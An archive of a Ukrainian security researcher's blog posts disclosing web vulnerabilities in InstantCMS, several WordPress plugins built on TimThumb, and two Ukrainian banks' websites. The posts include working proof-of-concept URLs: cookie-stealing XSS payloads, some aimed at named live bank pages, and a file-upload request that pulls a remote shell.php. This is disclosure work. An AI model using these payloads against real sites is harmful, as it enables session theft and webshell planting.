Архів для категорії 'Уразливості'

Нові уразливості на kredobank.com.ua

22:48 26.09.2013

15.06.2013

У лютому, 22.02.2013, я знайшов нові уразливості на http://kredobank.com.ua - сайті банка КРЕДОБАНК. Цього разу це Cross-Site Scripting дірки. Про що найближчим часом сповіщу адміністрацію сайта.

Раніше я вже писав про уразливості на kredobank.com.ua.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

26.09.2013

XSS:

На сайті ще є багато інших уразливостей.

Дані уразливості досі не виправлені.

Уразливості в плагінах для WordPress №118

23:53 25.09.2013

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах IndiaNIC Testimonia, NextGen Smooth Gallery та Event Easy Calendar. Для котрих з’явилися експлоіти. IndiaNIC Testimonia - це плагін для написання рецензій, NextGen Smooth Gallery - це плагін для створення галереї зображень, Event Easy Calendar - це плагін для створення календаря на сайті.

  • WordPress IndiaNIC Testimonial 2.2 XSS / CSRF / SQL Injection (деталі)
  • WordPress NextGen Smooth Gallery Cross Site Scripting (деталі)
  • WordPress Event Easy Calendar 1.0.0 XSS / CSRF / Input Validation (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Нові уразливості в InstantCMS

17:27 25.09.2013

30.07.2013

У липні, 14.07.2013, я знайшов Login Enumeration, Cross-Site Scripting та Content Spoofing уразливості в InstantCMS. Про що найближчим часом повідомлю розробникам системи.

Раніше я вже писав про уразливості в InstantCMS.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

24.09.2013

Login Enumeration (WASC-42):

http://site/users/login

Можна виявляти логіни по профілям користувачів. А також логіни користувачів виводяться в багатьох розділах сайта (сторінці користувачів та інших), бо розробники зовсім не переживають за витоки логінів користувачів.

Cross-Site Scripting (WASC-08):

http://site/includes/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/includes/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

Content Spoofing (WASC-12):

http://site/includes/swfupload/swfupload.swf?buttonText=test%3Cimg%20src=%27http://demo.swfupload.org/v220/images/logo.gif%27%3E
http://site/includes/swfupload/swfupload.swf?buttonImageURL=http://demo.swfupload.org/v220/images/logo.gif

Вразливі InstantCMS 1.10.2 та попередні версії.

Дані уразливості досі не виправлені.

Уразливості на pravex.com

23:54 21.09.2013

27.04.2013

У січні, 11.01.2013, я знайшов Cross-Site Scripting та Information Leakage уразливості на http://pravex.com - сайті Правекс Банка. Про що найближчим часом сповіщу адміністрацію сайта.

Стосовно уразливостей на сайтах банків останній раз я писав про уразливості на kredobank.com.ua.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

21.09.2013

XSS:

http://pravex.com:8088/queryacc.jsp?acc=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Information Leakage:

http://pravex.com:8088/queryacc.jsp

Витік інформації про рахунки клієнтів.

Адміни зупинили роботу цього веб додатку (чи внесли баг, тому він перестав працювати). І тим самим “виправили” дві вищезгадані уразливості, але додали нову Information Leakage дірку. Тепер на сторінці виводиться інформація про веб сервер, про Java пакети на сервері та про SQL запит до СУБД.

Добірка уразливостей

17:22 21.09.2013

В даній добірці уразливості в веб додатках:

  • QNAP Turbo NAS Multiple Vulnerabilities (деталі)
  • Apache OFBiz Nested expression evaluation allows remote users to execute arbitrary UEL functions in OFBiz (деталі)
  • Apache OFBiz XSS vulnerability in the “View Log” screen of the Webtools application (деталі)
  • Easy Blog by JM LLC - Multiple Vulnerabilities (деталі)
  • EMC AlphaStor Buffer Overflow Vulnerability (деталі)

Уразливості в плагінах для WordPress №117

23:52 19.09.2013

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах silverOrchid, Encrypted Blog та Wordfence. Для котрих з’явилися експлоіти. silverOrchid - це тема движка, Encrypted Blog - це плагін для шифрування блогу, Wordfence - це секюріті плагін для WordPress. Раніше я вже знаходив уразливості в Wordfence Security і пропонував розробнику провести аудит його плагіна, але він відмовився, тому зовсім не дивні повідомлення про нові уразливості в цьому плагіні.

  • WordPress silverOrchid Cross Site Scripting (деталі)
  • WordPress Encrypted Blog 0.0.6.2 XSS / Open Redirect (деталі)
  • WordPress Wordfence 3.8.1 Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Численні уразливості в RokIntroScroller і RokMicroNews для WordPress

16:22 19.09.2013

Торік я писав про численні уразливості в Rokbox для WordPress. А минулого тижня я виявив численні уразливості в плагінах RokIntroScroller і RokMicroNews для WordPress. Зокрема Cross-Site Scripting, Full path disclosure, Abuse of Functionality, Denial of Service та Arbitrary File Upload уразливості.

Стосовно плагінів для WordPress раніше я писав про уразливості в RokStories і RokNewsPager.

В цих плагінах для WordPress використовуються TimThumb (окрім Rokbox, розробники включили його в інші свої плагіни). Тому вони мають всі дірки TimThumb, які я оприлюднив ще в 2011 році.

XSS (WASC-08):

http://site/wp-content/plugins/wp_rokintroscroller/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg
http://site/wp-content/plugins/wp_rokmicronews/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg

А також FPD, Abuse of Functionality і DoS в уразливості в TimThumb та Arbitrary File Upload уразливість, що була оприлюднена через 3,5 місяці після оприлюднення мною попередніх дірок.

AFU (WASC-31):

http://site/wp-content/plugins/wp_rokintroscroller/thumb.php?src=http://flickr.com.site.com/shell.php
http://site/wp-content/plugins/wp_rokmicronews/thumb.php?src=http://flickr.com.site.com/shell.php

Full path disclosure (WASC-13):

http://site/wp-content/plugins/wp_rokintroscroller/rokintroscroller.php
http://site/wp-content/plugins/wp_rokmicronews/rokmicronews.php

Вразливі RokIntroScroller 1.8 і попередні версії та RokMicroNews 1.5 і попередні версії. А до останньої FPD вразливі всі версії плагінів RokIntroScroller та RokMicroNews.

Численні уразливості в RokStories і RokNewsPager для WordPress

23:58 18.09.2013

Торік я писав про численні уразливості в Rokbox для WordPress. А минулого тижня я виявив численні уразливості в плагінах RokStories і RokNewsPager для WordPress. Зокрема Cross-Site Scripting, Full path disclosure, Abuse of Functionality, Denial of Service та Arbitrary File Upload уразливості.

Стосовно плагінів для WordPress раніше я писав про уразливості в WPtouch і WPtouch Pro.

В цих плагінах для WordPress використовуються TimThumb (окрім Rokbox, розробники включили його в інші свої плагіни). Тому вони мають всі дірки TimThumb, які я оприлюднив ще в 2011 році.

XSS (WASC-08):

http://site/wp-content/plugins/wp_rokstories/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg
http://site/wp-content/plugins/wp_roknewspager/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg

А також FPD, Abuse of Functionality і DoS в уразливості в TimThumb та Arbitrary File Upload уразливість, що була оприлюднена через 3,5 місяці після оприлюднення мною попередніх дірок.

AFU (WASC-31):

http://site/wp-content/plugins/wp_rokstories/thumb.php?src=http://flickr.com.site.com/shell.php
http://site/wp-content/plugins/wp_roknewspager/thumb.php?src=http://flickr.com.site.com/shell.php

Full path disclosure (WASC-13):

http://site/wp-content/plugins/wp_rokstories/rokstories.php
http://site/wp-content/plugins/wp_roknewspager/roknewspager.php

Вразливі RokStories 1.25 і попередні версії та RokNewsPager 1.17 і попередні версії. А до останньої FPD вразливі всі версії плагінів RokStories та RokNewsPager.

Уразливості в InstantCMS

23:59 17.09.2013

17.07.2013

У липні, 14.07.2013, я знайшов Cross-Site Scripting та Redirector уразливості в InstantCMS. Про що найближчим часом повідомлю розробникам системи.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

17.09.2013

Cross-Site Scripting (WASC-08):

GET запит до http://site/modules/mod_template/set.php з вказанням заголовку Referer.

Referer: data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

Redirector (URL Redirector Abuse) (WASC-38):

GET запит до http://site/modules/mod_template/set.php з вказанням заголовку Referer.

Referer: http://websecurity.com.ua

Вразливі InstantCMS 1.10.2 та попередні версії.

Дані уразливості досі не виправлені.

Добірка уразливостей

16:23 17.09.2013

В даній добірці уразливості в веб додатках: